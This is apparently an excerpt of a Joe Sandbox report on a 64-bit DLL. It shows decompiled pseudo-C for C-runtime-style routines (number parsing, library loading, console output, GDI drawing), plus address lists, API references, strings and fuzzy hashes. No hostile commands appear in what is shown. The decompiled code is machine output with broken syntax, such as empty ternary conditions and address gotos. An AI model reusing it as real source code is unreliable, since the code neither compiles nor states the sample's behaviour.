				E00007FFD7FFD14669674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0x1466901d;
				 *_t389 =  *_t397;
				goto 0x1466901d;
				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x146689fb;
				0x14669140();
				goto 0x146689fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFD7FFD1466B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x146689ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x14668a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x14668da0;
				if (_t199 - 0x30 < 0) goto 0x14668cef;
				if (_t199 - 0x3a >= 0) goto 0x14668b3e;
				goto 0x14668cea;
				if (_t199 - 0xff10 >= 0) goto 0x14668cdb;
				if (_t199 - r8w < 0) goto 0x14668cef;
				if (_t199 - 0x66a >= 0) goto 0x14668b66;
				goto 0x14668cea;
				if (_t199 - r10w < 0) goto 0x14668cef;
				if (_t199 - 0x6fa >= 0) goto 0x14668b85;
				goto 0x14668cea;
				if (_t199 - r11w < 0) goto 0x14668cef;
				if (_t199 - 0x970 >= 0) goto 0x14668ba4;
				goto 0x14668cea;
				if (_t199 - r9w < 0) goto 0x14668cef;
				if (_t199 - 0x9f0 >= 0) goto 0x14668bc3;
				goto 0x14668cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x14668cef;
				if (_t199 - _a16 >= 0) goto 0x14668be3;
				goto 0x14668cea;
				if (_t199 - _v152 < 0) goto 0x14668cef;
				if (_t199 - _v148 < 0) goto 0x14668b34;
				if (_t199 - _v144 < 0) goto 0x14668cef;
				if (_t199 - _v140 < 0) goto 0x14668b34;
				if (_t199 - _v136 < 0) goto 0x14668cef;
				if (_t199 - _v132 < 0) goto 0x14668b34;
				if (_t199 - _v128 < 0) goto 0x14668cef;
				if (_t199 - _v124 < 0) goto 0x14668b34;
				if (_t199 - _v120 < 0) goto 0x14668cef;
				if (_t199 - _v116 < 0) goto 0x14668b34;
				if (_t199 - _v112 < 0) goto 0x14668cef;
				if (_t199 - _v108 < 0) goto 0x14668b34;
				if (_t199 - _v104 < 0) goto 0x14668cef;
				if (_t199 - _v100 < 0) goto 0x14668b34;
				if (_t199 - _v96 < 0) goto 0x14668cef;
				if (_t199 - _v92 < 0) goto 0x14668b34;
				if (_t199 - _v88 < 0) goto 0x14668cef;
				if (_t199 - _v84 < 0) goto 0x14668b34;
				if (_t199 - _v80 < 0) goto 0x14668cef;
				if (_t199 - _v76 < 0) goto 0x14668b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x14668cef;
				goto 0x14668b34;
				if (_t199 - _v68 >= 0) goto 0x14668cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x14668d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x14668d06;
				if (_t155 - 0x19 > 0) goto 0x14668d91;
				if (_t155 - 0x19 > 0) goto 0x14668d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0x14668d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x14668d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0x14668d71;
				if ( *_t390 == _t250) goto 0x14668d71;
				E00007FFD7FFD1466B420(_t381);
				 *_t381 = 0x16;
				E00007FFD7FFD14669744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x14668da0;
				r8d = 0x660;
				goto 0x14668da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0x14668d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0x14668f70;
				if (_t200 - 0x3a >= 0) goto 0x14668dd2;
				goto 0x14668f6b;
				if (_t200 - r15w >= 0) goto 0x14668f5b;
				if (_t200 - r8w < 0) goto 0x14668f70;
				if (_t200 - 0x66a >= 0) goto 0x14668dfb;
				goto 0x14668f6b;
				if (_t200 - r10w < 0) goto 0x14668f70;
				if (_t200 - 0x6fa >= 0) goto 0x14668e1a;
				goto 0x14668f6b;
				if (_t200 - r11w < 0) goto 0x14668f70;
				if (_t200 - 0x970 >= 0) goto 0x14668e39;
				goto 0x14668f6b;
				if (_t200 - 0x9e6 < 0) goto 0x14668f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0x14668e59;
				goto 0x14668f6b;
				if (_t200 - 0xa66 < 0) goto 0x14668f70;
				if (_t200 - _a16 < 0) goto 0x14668e4f;
				if (_t200 - _v152 < 0) goto 0x14668f70;
				if (_t200 - _v148 < 0) goto 0x14668e4f;
				if (_t200 - _v144 < 0) goto 0x14668f70;
				if (_t200 - _v140 < 0) goto 0x14668e4f;
				if (_t200 - _v136 < 0) goto 0x14668f70;
				if (_t200 - _v132 < 0) goto 0x14668e4f;
				if (_t200 - _v128 < 0) goto 0x14668f70;
				if (_t200 - _v124 < 0) goto 0x14668e4f;
				if (_t200 - _v120 < 0) goto 0x14668f70;
				if (_t200 - _v116 < 0) goto 0x14668e4f;
				if (_t200 - _v112 < 0) goto 0x14668f70;
				if (_t200 - _v108 < 0) goto 0x14668e4f;
				if (_t200 - _v104 < 0) goto 0x14668f70;
				if (_t200 - _v100 < 0) goto 0x14668e4f;
				if (_t200 - _v96 < 0) goto 0x14668f70;
				if (_t200 - _v92 < 0) goto 0x14668e4f;
				if (_t200 - _v88 < 0) goto 0x14668f70;
				if (_t200 - _v84 < 0) goto 0x14668e4f;
				if (_t200 - _v80 < 0) goto 0x14668f70;
				if (_t200 - _v76 < 0) goto 0x14668e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x14668f70;
				goto 0x14668f6b;
				if (_t200 - _v68 >= 0) goto 0x14668f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x14668f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x14668f83;
				if (_t185 - 0x19 > 0) goto 0x14668f90;
				if (_t185 - 0x19 > 0) goto 0x14668f8b;
				goto 0x14668f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x14668fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x14668db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0x14669008;
				if ( *_t384 == _t201) goto 0x14669008;
				E00007FFD7FFD1466B420(_t384);
				 *_t384 = 0x16;
				E00007FFD7FFD14669744();
				if ((sil & 0x00000008) != 0) goto 0x14669024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0x1466901d;
				 *_t385 = _t407;
				goto 0x146690a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0x1466904c;
				if ((sil & 0x00000001) == 0) goto 0x1466908f;
				if ((sil & 0x00000002) == 0) goto 0x14669047;
				if (_t261 - r8d <= 0) goto 0x14669095;
				goto 0x1466904c;
				if (_t261 - r9d <= 0) goto 0x14669097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0x14669067;
				goto 0x14669097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0x1466907f;
				if (_t395 == 0) goto 0x1466907a;
				 *_t395 =  *_t397;
				goto 0x146690a8;
				if (_t395 == 0) goto 0x1466908a;
				 *_t395 =  *_t397;
				goto 0x146690a8;
				if ((sil & 0x00000002) == 0) goto 0x14669097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0x146690a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

0x7ffd1466893c
0x7ffd1466893c
0x7ffd1466893c
0x7ffd1466893c
0x7ffd14668941
0x7ffd14668958
0x7ffd1466895b
0x7ffd1466895e
0x7ffd14668962
0x7ffd14668965
0x7ffd1466896d
0x7ffd14668973
0x7ffd14668975
0x7ffd1466897a
0x7ffd14668980
0x7ffd14668985
0x7ffd1466898a
0x7ffd1466898c
0x7ffd14668993
0x7ffd14668995
0x7ffd1466899a
0x7ffd1466899d
0x7ffd146689a1
0x7ffd146689a4
0x7ffd146689af
0x7ffd146689b4
0x7ffd146689b9
0x7ffd146689c0
0x7ffd146689c9
0x7ffd146689cc
0x7ffd146689db
0x7ffd146689de
0x7ffd146689e5
0x7ffd146689e7
0x7ffd146689ec
0x7ffd146689ee
0x7ffd146689f8
0x7ffd14668a0a
0x7ffd14668a1a
0x7ffd14668a23
0x7ffd14668a25
0x7ffd14668a28
0x7ffd14668a2b
0x7ffd14668a2f
0x7ffd14668a32
0x7ffd14668a42
0x7ffd14668a4f
0x7ffd14668a5c
0x7ffd14668a64
0x7ffd14668a6a
0x7ffd14668a72
0x7ffd14668a72
0x7ffd14668a76
0x7ffd14668a7e
0x7ffd14668a84
0x7ffd14668a8c
0x7ffd14668a92
0x7ffd14668a9a
0x7ffd14668aa2
0x7ffd14668aaa
0x7ffd14668ab2
0x7ffd14668aba
0x7ffd14668ac2
0x7ffd14668aca
0x7ffd14668ad2
0x7ffd14668ada
0x7ffd14668ae2
0x7ffd14668aea
0x7ffd14668af2
0x7ffd14668afa
0x7ffd14668b02
0x7ffd14668b0d
0x7ffd14668b1f
0x7ffd14668b28
0x7ffd14668b32
0x7ffd14668b39
0x7ffd14668b41
0x7ffd14668b4b
0x7ffd14668b59
0x7ffd14668b61
0x7ffd14668b6a
0x7ffd14668b78
0x7ffd14668b80
0x7ffd14668b89
0x7ffd14668b97
0x7ffd14668b9f
0x7ffd14668ba8
0x7ffd14668bb6
0x7ffd14668bbe
0x7ffd14668bc6
0x7ffd14668bd4
0x7ffd14668bde
0x7ffd14668bea
0x7ffd14668bf5
0x7ffd14668c02
0x7ffd14668c0d
0x7ffd14668c1a
0x7ffd14668c25
0x7ffd14668c32
0x7ffd14668c3d
0x7ffd14668c4a
0x7ffd14668c55
0x7ffd14668c62
0x7ffd14668c6d
0x7ffd14668c7a
0x7ffd14668c81
0x7ffd14668c8e
0x7ffd14668c95
0x7ffd14668ca2
0x7ffd14668ca9
0x7ffd14668cb6
0x7ffd14668cbd
0x7ffd14668cd4
0x7ffd14668cd6
0x7ffd14668ce3
0x7ffd14668ced
0x7ffd14668cf2
0x7ffd14668cf8
0x7ffd14668cf8
0x7ffd14668cfb
0x7ffd14668d00
0x7ffd14668d09
0x7ffd14668d0e
0x7ffd14668d13
0x7ffd14668d15
0x7ffd14668d18
0x7ffd14668d1e
0x7ffd14668d21
0x7ffd14668d21
0x7ffd14668d25
0x7ffd14668d28
0x7ffd14668d2f
0x7ffd14668d34
0x7ffd14668d3c
0x7ffd14668d40
0x7ffd14668d46
0x7ffd14668d4b
0x7ffd14668d4d
0x7ffd14668d52
0x7ffd14668d58
0x7ffd14668d5d
0x7ffd14668d63
0x7ffd14668d69
0x7ffd14668d6f
0x7ffd14668d71
0x7ffd14668d77
0x7ffd14668d79
0x7ffd14668d7d
0x7ffd14668d7d
0x7ffd14668d81
0x7ffd14668d84
0x7ffd14668d8f
0x7ffd14668d99
0x7ffd14668d9d
0x7ffd14668da2
0x7ffd14668da5
0x7ffd14668da5
0x7ffd14668da8
0x7ffd14668dae
0x7ffd14668db4
0x7ffd14668dbb
0x7ffd14668dc5
0x7ffd14668dcd
0x7ffd14668dd6
0x7ffd14668de0
0x7ffd14668dee
0x7ffd14668df6
0x7ffd14668dff
0x7ffd14668e0d
0x7ffd14668e15
0x7ffd14668e1e
0x7ffd14668e2c
0x7ffd14668e34
0x7ffd14668e41
0x7ffd14668e47
0x7ffd14668e4d
0x7ffd14668e54
0x7ffd14668e61
0x7ffd14668e6f
0x7ffd14668e78
0x7ffd14668e83
0x7ffd14668e8c
0x7ffd14668e97
0x7ffd14668ea0
0x7ffd14668eab
0x7ffd14668eb4
0x7ffd14668ebf
0x7ffd14668ec8
0x7ffd14668ed3
0x7ffd14668ee0
0x7ffd14668eeb
0x7ffd14668ef8
0x7ffd14668eff
0x7ffd14668f0c
0x7ffd14668f13
0x7ffd14668f20
0x7ffd14668f27
0x7ffd14668f34
0x7ffd14668f3b
0x7ffd14668f52
0x7ffd14668f59
0x7ffd14668f63
0x7ffd14668f6e
0x7ffd14668f73
0x7ffd14668f79
0x7ffd14668f79
0x7ffd14668f7c
0x7ffd14668f81
0x7ffd14668f86
0x7ffd14668f8e
0x7ffd14668f93
0x7ffd14668f99
0x7ffd14668f9b
0x7ffd14668fa5
0x7ffd14668fb6
0x7ffd14668fbd
0x7ffd14668fc4
0x7ffd14668fcd
0x7ffd14668fd0
0x7ffd14668fd2
0x7ffd14668fd7
0x7ffd14668fdf
0x7ffd14668fdf
0x7ffd14668fe3
0x7ffd14668feb
0x7ffd14668ff1
0x7ffd14668ff6
0x7ffd14668ff8
0x7ffd14668ffd
0x7ffd14669003
0x7ffd1466900c
0x7ffd1466900e
0x7ffd14669012
0x7ffd14669018
0x7ffd1466901a
0x7ffd1466901f
0x7ffd14669024
0x7ffd1466902a
0x7ffd1466902a
0x7ffd14669032
0x7ffd14669038
0x7ffd1466903e
0x7ffd14669043
0x7ffd14669045
0x7ffd1466904a
0x7ffd1466904e
0x7ffd14669056
0x7ffd14669060
0x7ffd14669065
0x7ffd14669067
0x7ffd1466906d
0x7ffd14669072
0x7ffd14669077
0x7ffd1466907d
0x7ffd14669082
0x7ffd14669087
0x7ffd1466908d
0x7ffd14669093
0x7ffd14669097
0x7ffd1466909e
0x7ffd146690a3
0x7ffd146690c2

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14668980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14668D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14669003

Strings

-, xrefs: 00007FFD14668A16
p, xrefs: 00007FFD14668A32
p, xrefs: 00007FFD14668AAA
0, xrefs: 00007FFD14668DA8
f, xrefs: 00007FFD14668AA2

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 07018438adba67ad00a3bc40da8300d8a54d2129932a2e762e1d0e0959f13a18
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: EC12C4B1F0E94386FB209A35E0A42F97652FB93778F844136E689476C4DF7DE9848B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14672FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFD14672FCD
SelectObject.GDI32 ref: 00007FFD14672FE5
Polyline.GDI32 ref: 00007FFD14673230
MoveToEx.GDI32 ref: 00007FFD1467325C
LineTo.GDI32 ref: 00007FFD14673285
MoveToEx.GDI32 ref: 00007FFD146732B1
LineTo.GDI32 ref: 00007FFD146732DA
SelectObject.GDI32 ref: 00007FFD146732ED
DeleteObject.GDI32 ref: 00007FFD146732F8

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: fca3390cca926b76baed62252bf9effc058a9ae23de5eb707d2d45a4e63e2bf6
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: BF91ED76718B408AD765CB28E06136AF7A5F7C9798F104226DACE97B68DF3CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466D8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFD7FFD1466D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0x146de008; // 0xef3156171c50
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffd14660000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x1466da36;
				if (_t72 == 0) goto 0x1466d959;
				_t57 = _t72;
				goto 0x1466da38;
				if (__r8 == __r9) goto 0x1466da1b;
				_t61 =  *((intOrPtr*)(0x7ffd14660000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0x1466d980;
				if (_t61 != _t76) goto 0x1466da75;
				goto 0x1466da07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0x1466da55;
				if (GetLastError() != 0x57) goto 0x1466d9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFD7FFD1466F5B0(_t90) == 0) goto 0x1466d9f5;
				r8d = _t37;
				if (E00007FFD7FFD1466F5B0(_t90) == 0) goto 0x1466d9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0x1466da55;
				 *((intOrPtr*)(0x7ffd14660000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x1466d962;
				_t91 =  *0x146de008; // 0xef3156171c50
				asm("dec eax");
				 *(0x7ffd14660000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

0x7ffd1466d8f0
0x7ffd1466d8f5
0x7ffd1466d8fa
0x7ffd1466d90c
0x7ffd1466d927
0x7ffd1466d92e
0x7ffd1466d938
0x7ffd1466d940
0x7ffd1466d946
0x7ffd1466d94f
0x7ffd1466d951
0x7ffd1466d954
0x7ffd1466d95c
0x7ffd1466d965
0x7ffd1466d970
0x7ffd1466d975
0x7ffd1466d97b
0x7ffd1466d98d
0x7ffd1466d993
0x7ffd1466d99f
0x7ffd1466d9ae
0x7ffd1466d9b0
0x7ffd1466d9b0
0x7ffd1466d9b6
0x7ffd1466d9c7
0x7ffd1466d9c9
0x7ffd1466d9dd
0x7ffd1466d9df
0x7ffd1466d9e7
0x7ffd1466d9f3
0x7ffd1466d9ff
0x7ffd1466da0e
0x7ffd1466da14
0x7ffd1466da28
0x7ffd1466da2e
0x7ffd1466da54

APIs

FreeLibrary.KERNEL32 ref: 00007FFD1466DA6F
GetProcAddress.KERNEL32 ref: 00007FFD1466DA7B

Strings

api-ms-, xrefs: 00007FFD1466D9B9
ext-ms-, xrefs: 00007FFD1466D9CC

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: 3b148e3b6b8bc95d4746d11faf3d9beca2e77a23303fc7701401f5f7849d8d3d
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 5341CE62B1DE4281FA159F26D8A41F62291AF57BB8F098236DD1D87784EE3CE4828300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466B8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFD1466B8E3
FlsGetValue.KERNEL32 ref: 00007FFD1466B8F8
FlsSetValue.KERNEL32 ref: 00007FFD1466B919
FlsSetValue.KERNEL32 ref: 00007FFD1466B946
FlsSetValue.KERNEL32 ref: 00007FFD1466B957
FlsSetValue.KERNEL32 ref: 00007FFD1466B968
SetLastError.KERNEL32 ref: 00007FFD1466B983

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction ID: 8dac8315b859451d8f58e9966a9b8d57b4ac59bcd2145e0cc95856e4b9c426d4
Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction Fuzzy Hash: D0215E20F1CE6682FA646B3295F12FD61425F5BBB8F144738E97E07AD6DE2CB4818200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146728C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFD146728F1
GetLastError.KERNEL32 ref: 00007FFD146728FD
CloseHandle.KERNEL32 ref: 00007FFD14672915
CreateFileW.KERNEL32 ref: 00007FFD14672940
WriteConsoleW.KERNEL32 ref: 00007FFD1467295F

Strings

CONOUT$, xrefs: 00007FFD14672921

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: 8f4f093866c73ed86c628f3623eb34f2363574e47a85ce51ef2ab7c2f7050d7d
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 31118121B18E42C6F7508B22E8A43A962A4FB8ABF8F044234EA5D87794DF7CD4448780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14669C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFD14669C49
GetProcAddress.KERNEL32 ref: 00007FFD14669C5F
FreeLibrary.KERNEL32 ref: 00007FFD14669C86

Strings

mscoree.dll, xrefs: 00007FFD14669C40
CorExitProcess, xrefs: 00007FFD14669C58

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

